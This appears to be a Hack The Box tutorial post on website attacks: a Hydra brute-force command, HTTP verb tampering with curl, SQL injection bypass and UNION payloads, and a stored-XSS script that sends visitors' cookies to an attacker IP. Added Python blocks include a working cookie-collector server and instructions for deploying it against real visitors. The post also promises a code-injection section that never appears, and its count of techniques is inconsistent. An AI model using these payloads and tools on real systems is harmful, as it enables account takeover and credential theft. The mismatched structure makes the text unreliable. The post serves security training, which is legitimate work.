RED TEAMING 9 MIN READ

4 website hacking techniques (try these on your next pentest)

Four beginner-friendly website hacking techniques to try on your next pentest (with live “follow-along” examples)!

g4rg4m3l, Aug 06 2024

Are you looking to learn how to protect the web, or just want a more in-depth understanding of how attackers target web applications?

This guide will explore five hacking techniques, ranging from beginner to advanced levels. We’ll cover:

• Login brute force
• HTTP verb tampering
• SQLi
• XSS
• Code injection leading to remote code execution

Before we start, it's important that you note the following “do not try this at home” disclaimer:

These examples are for educational and informative purposes only, and are intended to provide insights into the methods attackers use to compromise website security.

If you want to try these techniques, always practice in a safe, controlled environment such as your local computer or on the Hack The Box (HTB) platform.

Now, let's rock and roll.

Login brute force


A brute force attack is a trial-and-error approach against a certain feature or service. For our example, we will focus on a web application login. In this case, the application requires a username and password to allow access.

In this scenario, attackers can use a variety of approaches. We will focus on demonstrating what is known as a brute-force dictionary attack.

A typical dictionary brute force attack uses password lists: large text files containing thousands of common passwords gathered from years of data breaches.

To simulate our attack, we will use the popular “rockyou.txt” wordlist. But there are all kinds of reputable wordlists, such as the SecLists project, which is maintained by Daniel Miessler, Jason Haddix, and g0tmi1k.

We will conduct our attacks against the web application of the evil "g4rg4m3l". Let's help the Smurfs. Remember to always hack for good!

A common username found in all kinds of services and applications is "admin." So that’s the account we’ll try to brute force.

First, we will try the username admin with the password "testing".

As expected, we get back an "Invalid username or password" error message. That exact string matters: it is what our tool will use to tell a failed login apart from a successful one.

Now we’ll brute force the login with the user admin and the rockyou.txt password list.

We’ll use the Hydra tool to perform this attack from the command line. But there are plenty of tools that can perform this attack, such as Burp Suite.

hydra -l admin -P /usr/share/wordlists/rockyou.txt -f -vV g4rg4m3l.htb http-post-form "/login.php:username=^USER^&password=^PASS^:Invalid username or password"

Use the:

• -l option to specify the username.
• -P for the password list.
• -f to stop Hydra on the first successful login.
• -vV to see verbose output (every attempt and the response it got).

The last argument describes the form to Hydra: the login path, the POST body with ^USER^ and ^PASS^ as placeholders that Hydra substitutes on each attempt, and, after the final colon, the string "Invalid username or password" that corresponds to the unsuccessful login message. Hydra treats any response that does not contain that string as a success, so pick a failure string that only ever appears on failed logins.

As we can see, Hydra checked the passwords one by one until it found the one that corresponds to the user admin, which was password123.

Go ahead and say the line: "We're in!"

This technique is considered suitable for beginners because it requires minimal skills. To conduct this attack, attackers only need a basic understanding of how web applications work and proficiency with brute force tools like Hydra and Burp Suite.
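The same logic Hydra applies above, as an added example that is not code from the original post: it starts a throwaway, hypothetical /login.php look-alike on localhost (no lockout, no rate limiting) and runs a dictionary attack against it using Hydra's rule for detecting a hit, namely that the failure string is absent from the response. The wordlist and the credential it finds are constructed stand-ins for rockyou.txt and g4rg4m3l's real admin password.

```python
"""Dictionary attack against an HTTP login form, the way Hydra's http-post-form does it."""
import threading
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

FAILURE_STRING = "Invalid username or password"

# Constructed stand-in for rockyou.txt (hypothetical, a handful of entries).
WORDLIST = ["123456", "password", "qwerty", "letmein", "password123", "iloveyou"]

# Hypothetical server-side credential store; never sent to the client.
_VALID = {"admin": "password123"}


class LoginHandler(BaseHTTPRequestHandler):
    """Accepts username/password as a form POST and answers with a fixed failure string."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        user = form.get("username", [""])[0]
        password = form.get("password", [""])[0]
        if _VALID.get(user) == password:
            body = "Welcome back, %s" % user
        else:
            body = FAILURE_STRING
        self.send_response(200)  # same status either way: only the body differs
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(body.encode())

    def log_message(self, *args):
        pass  # keep the demo quiet


def start_target():
    """Serve the vulnerable login on an ephemeral localhost port; returns (server, login_url)."""
    server = ThreadingHTTPServer(("127.0.0.1", 0), LoginHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, "http://127.0.0.1:%d/login.php" % server.server_address[1]


def try_login(login_url, user, password):
    """One POST attempt. True when FAILURE_STRING is absent from the response body."""
    data = urllib.parse.urlencode({"username": user, "password": password}).encode()
    req = urllib.request.Request(login_url, data=data)  # data= makes it a POST
    with urllib.request.urlopen(req, timeout=5) as resp:
        return FAILURE_STRING not in resp.read().decode()


def brute_force(login_url, user, wordlist):
    """Try each candidate in order and stop at the first hit (hydra -f).

    Returns (password, attempts) on success or (None, attempts) when the list is exhausted.
    """
    attempts = 0
    for candidate in wordlist:
        attempts += 1
        if try_login(login_url, user, candidate):
            return candidate, attempts
    return None, attempts


if __name__ == "__main__":
    server, url = start_target()
    try:
        print(brute_force(url, "admin", WORDLIST))  # ('password123', 5)
    finally:
        server.shutdown()
```

The detection rule is the part worth internalising: Hydra's http-post-form condition is a failure string by default, so a site that answers a correct login with a redirect and an empty body still counts as a hit, while a site whose error text varies (or that starts returning lockout pages) produces false positives. Hydra accepts an S=... prefix to match on a success string instead when that fits the target better.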

Go deeper

Check out these HTB courses to learn more:

• Introduction to Web Applications.
• Login Brute Forcing.

HTTP verb tampering


Attackers are always on the lookout for indicators of poor security posture, such as the weak password on the "g4rg4m3l" website's admin account.

These hints alert attackers that a certain web application can probably be further exploited due to a general lack of security.

Upon further exploration, we come across the "G4RG4M3L's Evil Plans" section of our example website, where he lays out several of his evil plans against the Smurfs.

Each plan includes a "Delete Plan" button. Let's try to delete those evil plans.

It seems that despite his poor password choices, g4rg4m3l has some sort of protection against the deletion of his plans.

However, when we inspect these actions in the browser developer tools, we notice that the request is made using the DELETE HTTP method.

HTTP methods (also called verbs) specify the type of action a web server must perform for a particular request.

By manipulating HTTP verbs, such as changing DELETE to GET, an attacker can tamper with the functionality of a web application, leading to data manipulation and deletion on the server. This works when the access control is tied to the verb rather than to the action: the server checks authorization for DELETE, but the same code path is reachable through another method that nobody thought to restrict.

For our HTTP verb tampering attack against g4rg4m3l, we'll change the DELETE verb to GET and send the same request using the cURL command line tool.

curl -X GET -d "evil_plan_id=666f1081b50c" http://g4rg4m3l.htb/evil_plans.php

• The -X option is used to specify the HTTP verb.
• We also need to identify the id of the plan we want to test, which we can obtain through HTML inspection or by selecting COPY DELETE DATA in the browser dev tools.
• With -d, cURL sends the parameter in the request body even though the method is GET. If the application only reads GET parameters from the query string, move it there instead (evil_plans.php?evil_plan_id=...).

After we refresh the page, it becomes apparent that changing the HTTP verb led to the first plan’s deletion.

By tampering with HTTP verbs, attackers can mess with web application functionality with potentially catastrophic consequences, such as deleting data.
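The bug pattern behind this, as an added example that is not the post's code: a hypothetical evil_plans.php whose admin check runs only when the method is DELETE, while the deletion code path is still reachable through every other method (the kind of hole produced by a web-server rule such as Apache's <Limit DELETE>), next to a hardened version, plus a probe that replays the same unauthenticated request under each verb and reports which ones got the plan deleted. The plan ids are constructed.

```python
"""HTTP verb tampering: an access check tied to the verb instead of to the action."""
from dataclasses import dataclass, field

# Standard verbs plus one made-up token: servers that fall through to a default
# handler for unknown methods are a classic verb-tampering target.
PROBE_METHODS = ["GET", "POST", "PUT", "PATCH", "DELETE", "HEAD", "OPTIONS", "FOO"]


@dataclass
class Request:
    method: str
    params: dict
    is_admin: bool = False  # would come from the session in a real app


@dataclass
class PlanStore:
    # Constructed plan ids (hypothetical).
    plans: dict = field(default_factory=lambda: {
        "666f1081b50c": "Capture Papa Smurf",
        "a7c3e9f0b2d1": "Poison the sarsaparilla",
    })


def _delete_plan(req, store):
    plan_id = req.params.get("evil_plan_id")
    if plan_id not in store.plans:
        return 404, "no such plan"
    del store.plans[plan_id]
    return 200, "deleted %s" % plan_id


def vulnerable_handler(req, store):
    """Authorization keyed on the verb: only DELETE is checked, everything else falls through."""
    if req.method == "DELETE" and not req.is_admin:
        return 403, "Forbidden"
    return _delete_plan(req, store)  # reached by GET, POST, FOO, ... with no check at all


def hardened_handler(req, store):
    """Reject verbs the endpoint does not implement, then authorize the action itself."""
    if req.method != "DELETE":
        return 405, "Method Not Allowed"
    if not req.is_admin:
        return 403, "Forbidden"
    return _delete_plan(req, store)


def probe(handler, plan_id, methods=PROBE_METHODS):
    """Replay one unauthenticated request per verb; return the verbs that deleted the plan."""
    bypassed = []
    for method in methods:
        store = PlanStore()  # fresh state per attempt so each verb is judged on its own
        handler(Request(method, {"evil_plan_id": plan_id}), store)
        if plan_id not in store.plans:
            bypassed.append(method)
    return bypassed


if __name__ == "__main__":
    print("vulnerable:", probe(vulnerable_handler, "666f1081b50c"))
    print("hardened:  ", probe(hardened_handler, "666f1081b50c"))
```

The cURL line in the post is this probe done by hand for a single verb; against a live target the same loop is a few curl -X calls, and a 405 for every method except the intended one is the answer you want to see. The fix is in the order of the checks: decide whether the verb is implemented first, then authorize the operation, never the other way round.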

To perform these attacks, you’ll need a clear understanding of the HTTP protocol and how web applications work, as well as tools like browser developer tools and cURL.

Go deeper

Check out these HTB courses to learn more:

• Web Requests.
• Web Attacks.

SQL Injection

Let's revisit the login section. For a simple authentication process, we can assume that the username and its corresponding password are stored in a database.

When the user enters their username and password, a verification process occurs on the backend to check if they exist in that database.

Attackers can take advantage of this process by inserting malicious Structured Query Language (SQL) statements into web form fields instead of the expected user input.

This type of attack, called SQL injection, can manipulate the database, potentially access sensitive information, and even bypass authentication.

When a username and password exist in the database, the SQL statement will return a row and authenticate that particular user.

However, if the application does not properly protect against these kinds of attacks, an attacker can directly input an SQL fragment that makes the condition always true, such as ' OR '1'='1. Entered in the password field, this turns the query's WHERE clause into something like username = 'admin' AND password = '' OR '1'='1', which matches regardless of whether the username and password are correct, and so bypasses the authentication method.

These types of vulnerabilities can be further exploited and potentially lead to data exfiltration when the malicious code tricks the database into exposing information.

For our example, we’ll use the ' UNION SELECT id, username, password, email FROM users -- - query to try and access sensitive information in the database.

By injecting a UNION SELECT statement, we can append our own query to the original query, and potentially retrieve data from other tables. For this to work, the injected SELECT must return the same number of columns as the original query, with compatible types, and the trailing comment (-- followed by a space) discards the remainder of the original statement.

By injecting our crafted query, we were able to retrieve information about the users stored in the application database.

We can use these credentials to access different user accounts in further attacks against the website.

It’s important to note that attackers need to follow several steps in order to create a functioning SQL statement: find an injectable parameter, work out how the input is quoted, and determine how many columns the original query returns.

Note: The methods and techniques used in these attacks can vary greatly based on the specific configuration and design of each database, due to the variety of ways databases can be configured.
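Both payloads from this section carried through end to end, as an added example that is not code from the original post. An in-memory SQLite database with a constructed users table stands in for g4rg4m3l's backend; the vulnerable functions build SQL by string formatting exactly as described above, and the safe ones use bound parameters. The posts table and its search query are hypothetical, added so the UNION has a four-column query to land in, and find_column_count shows the ORDER BY step an attacker runs before writing the UNION.

```python
"""SQL injection on a login and a search query: auth bypass, UNION extraction, and the fix."""
import sqlite3


def setup_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, email TEXT);
        INSERT INTO users VALUES (1, 'admin',  'password123', 'admin@g4rg4m3l.htb');
        INSERT INTO users VALUES (2, 'azrael', 'meow',        'azrael@g4rg4m3l.htb');
        CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT, body TEXT, author TEXT);
        INSERT INTO posts VALUES (1, 'Evil plan #1', 'Trap the Smurfs in a net', 'admin');
    """)
    return db


def vulnerable_login(db, username, password):
    """Returns matching rows; the input is spliced straight into the quoted literals."""
    sql = ("SELECT id, username FROM users "
           "WHERE username = '%s' AND password = '%s'" % (username, password))
    return db.execute(sql).fetchall()


def safe_login(db, username, password):
    """Same query with placeholders: the driver sends the values separately from the SQL text."""
    sql = "SELECT id, username FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchall()


def vulnerable_search(db, term):
    """Four-column query, so an injected UNION must also supply four columns."""
    sql = "SELECT id, title, body, author FROM posts WHERE title LIKE '%%%s%%'" % term
    return db.execute(sql).fetchall()


def safe_search(db, term):
    sql = "SELECT id, title, body, author FROM posts WHERE title LIKE ?"
    return db.execute(sql, ("%" + term + "%",)).fetchall()


def find_column_count(db, max_cols=12):
    """Step before the UNION: ORDER BY n errors out once n exceeds the column count."""
    for n in range(1, max_cols + 1):
        try:
            vulnerable_search(db, "' ORDER BY %d -- -" % n)
        except sqlite3.OperationalError:
            return n - 1
    return None


# The post's payloads, with the quote that closes the literal and the comment
# (-- followed by a space) that discards the rest of the original query.
BYPASS_PASSWORD = "' OR '1'='1"
UNION_PAYLOAD = "' UNION SELECT id, username, password, email FROM users -- -"


if __name__ == "__main__":
    db = setup_db()
    # password field:  ... AND password = '' OR '1'='1'   -> AND binds first, the OR makes it true
    print(vulnerable_login(db, "admin", BYPASS_PASSWORD))   # every user row
    # username field:  username = '' OR '1'='1' AND password = 'x'  -> still false, no bypass
    print(vulnerable_login(db, BYPASS_PASSWORD, "x"))        # []
    print(safe_login(db, "admin", BYPASS_PASSWORD))          # []
    print(find_column_count(db))                             # 4
    print(vulnerable_search(db, UNION_PAYLOAD))              # the post, then every user's credentials
```

Two details the prose glosses over are visible here. Where the payload lands matters: ' OR '1'='1 in the username field is neutralised by AND binding tighter than OR, so it goes in the last field of the WHERE clause (or is paired with a comment, as in admin' -- -). And the parameterised versions are not doing input validation at all; they simply never let the value become part of the SQL text, which is why they are the fix rather than a blacklist of quotes.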

In addition to the previously mentioned skills, this website hacking technique requires familiarity with web application infrastructures, databases, and SQL.

Go deeper

Check out these HTB courses to learn more:

• SQLMap Essentials.
• SQL Injection Fundamentals.

Cross-site scripting (XSS) / cookie theft

Cross-site scripting (XSS) attacks are a type of injection web hacking technique where an attacker can insert malicious code into a web application.

These attacks usually happen when an application accepts user input without proper validation and writes it into a page without encoding it for the HTML context.

Cross-site scripting allows malicious code to be mixed with legitimate input, ultimately giving attackers access to sensitive information, cookies, session tokens, and even the ability to modify the content of the web application.

There are several kinds of XSS attacks. We will focus on what's known as stored XSS, which can obtain cookies from unsuspecting users.

Stored XSS is an attack where malicious code is permanently injected into a target, or “stored”, in the comment section of a blog, a post, or a message.

When we access the comment section of our target web application, we can input a malicious script that begins with a <script> tag.

This tag instructs the browser to run the enclosed JavaScript code. The script looks like this:

<script>var img = new Image(); img.src = 'http://<attacker-IPaddress>:666/steal-cookies.php?cookie=' + document.cookie;</script>

Once executed, it creates a new image object whose source points at our server, which prompts the browser to send a GET request to that URL with the page's cookies appended to the query string.

When an unsuspecting visitor goes to the page, their browser will interpret the HTML and execute this code, which sends their cookie to the attacker's URL.

Note that document.cookie only exposes cookies set without the HttpOnly flag. A session cookie marked HttpOnly will not be in the stolen value, although the injected script still runs with the victim's privileges in the page and can act on their behalf.

With our XSS attack set, this is now a waiting game, as we’re waiting for visitors to visit g4rg4m3l’s page so we can get their cookies.

After a while, our attacker server captures a cookie from one of g4rg4m3l’s visitors. We’ll show you how to receive a connection back to our machine in our next example.
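The receiving end of the payload above, as an added example that is not code from the original post: a stand-in for the attacker's steal-cookies.php that records the cookie query parameter of every GET it gets, the payload generator with the listener URL filled in, and a simulated victim issuing the request the injected <script> would trigger. Host, port and the cookie values are constructed; on a real engagement the base URL is your listener's address, and the function names are this example's own.

```python
"""Cookie collector for the stored-XSS payload in the post."""
import threading
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

# (client_ip, cookie_string) pairs, appended as victims check in.
captured = []

# Smallest valid GIF: answering with a real image keeps the injected <img> from
# showing a broken-image icon that might tip off the victim.
_PIXEL = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff!\xf9\x04"
          b"\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;")


class CollectorHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        parsed = urllib.parse.urlparse(self.path)
        query = urllib.parse.parse_qs(parsed.query)
        if parsed.path == "/steal-cookies.php" and "cookie" in query:
            captured.append((self.client_address[0], query["cookie"][0]))
        self.send_response(200)
        self.send_header("Content-Type", "image/gif")
        self.end_headers()
        self.wfile.write(_PIXEL)

    def log_message(self, *args):
        pass  # silence the default access log


def start_collector(port=0):
    """Listen on localhost (port 0 = ephemeral); returns (server, base_url)."""
    server = ThreadingHTTPServer(("127.0.0.1", port), CollectorHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, "http://127.0.0.1:%d" % server.server_address[1]


def payload(attacker_base):
    """The comment body to store: the post's script with the listener URL filled in."""
    return ("<script>var img = new Image(); img.src = '%s/steal-cookies.php?cookie=' "
            "+ document.cookie;</script>" % attacker_base)


def simulate_victim(attacker_base, document_cookie):
    """What the victim's browser does on loading the comment: one GET with the cookies appended.

    Browsers percent-encode spaces and other unsafe characters in an <img> src,
    which quote() reproduces here; parse_qs on the collector side undoes it.
    Cookies flagged HttpOnly never appear in document.cookie and so are never sent.
    """
    url = attacker_base + "/steal-cookies.php?cookie=" + urllib.parse.quote(document_cookie)
    with urllib.request.urlopen(url, timeout=5) as resp:
        return resp.status


if __name__ == "__main__":
    server, base = start_collector()
    try:
        print(payload(base))
        simulate_victim(base, "PHPSESSID=deadbeefcafe; theme=dark")
        print(captured)  # [('127.0.0.1', 'PHPSESSID=deadbeefcafe; theme=dark')]
    finally:
        server.shutdown()
```

Run it on the attacker box with a fixed port (start_collector(666) to match the post), store payload("http://<attacker-IPaddress>:666") as the comment, and captured fills up as visitors load the page. What does not show up there is the defence: the comment should have been HTML-encoded on output, the session cookie should carry HttpOnly, and a Content-Security-Policy without inline scripts would have stopped the <script> from running at all.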

To execute these attacks, you must have all of the previously mentioned skills as well as proficiency with programming languages like Python, PHP, and JavaScript.

Go deeper

Check out these HTB courses to learn more:

• Cross-Site Scripting (XSS).
• Introduction to Python 3.

When web applications fail to validate user inputs, attackers can further exploit them to execute arbitrary commands on the host operating system (OS), potentially compromising the system entirely.

Become a certified website hacking specialist

We have covered some common techniques for hacking websites, from beginner to advanced levels:

• Login brute force
• HTTP verb tampering
• SQLi
• XSS
• Code injection leading to remote code execution

Bear in mind that we made these difficulty classifications based on the varying levels of knowledge in different areas that a web app penetration tester must have.

The nature and complexity of web applications make each one unique. So an attack that we classified as "advanced" may actually be relatively easy to perform if the web application has weak security. Similarly, a “beginner” level attack against a very secure website may be very complicated.

Understanding how attackers operate and learning the different techniques they use is crucial for protection and safety. We encourage you to explore all of the recommended modules and get hands-on practice.

Consider choosing a Job Role Path on Hack The Box Academy or a cybersecurity certification.

These resources will guide you through the Academy modules, helping you develop practical skills and the necessary mindset for a particular job role, such as a pentester, web app security expert, or SOC analyst.

Stay safe, be ethical, keep learning, and rock n' roll!

© 2024 Hack The Box
